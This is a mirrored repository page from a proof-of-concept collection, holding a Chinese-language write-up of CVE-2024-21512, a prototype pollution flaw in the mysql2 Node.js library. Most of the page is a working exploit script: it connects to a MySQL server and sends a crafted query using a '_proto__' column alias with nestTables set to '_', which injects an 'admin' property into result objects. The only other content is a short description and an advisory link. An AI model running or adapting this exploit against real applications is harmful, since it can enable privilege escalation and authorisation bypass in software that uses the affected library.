admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/mysql2/mysql2原型污染漏洞(CVE-2024-21512).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

33 lines
716 B
Markdown
Raw Blame History

## mysql2原型污染漏洞(CVE-2024-21512)
MySQL2 3.9.8 错误的版本中存在一个缺陷。该问题是由于使用 nestTables 时提交的字段和表用户输入清理不当而导致的实例污染。
## poc
```
const mysql = require('mysql2');
const connection = mysql.createConnection({
host: '127.0.0.1',
user: 'root',
database: 'test',
password: 'root',
});
let query_data = {
sql: `SELECT CAST('{"admin":true}' AS JSON)_proto__;`,
nestTables: "_",
};
connection.query(query_data, (err, results) => {
if (err) throw err;
console.log(Object.getPrototypeOf(results[0]));
console.log(results[0].admin);
});
connection.end();
```
## 漏洞来源
- https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580
Reference in New Issue View Git Blame Copy Permalink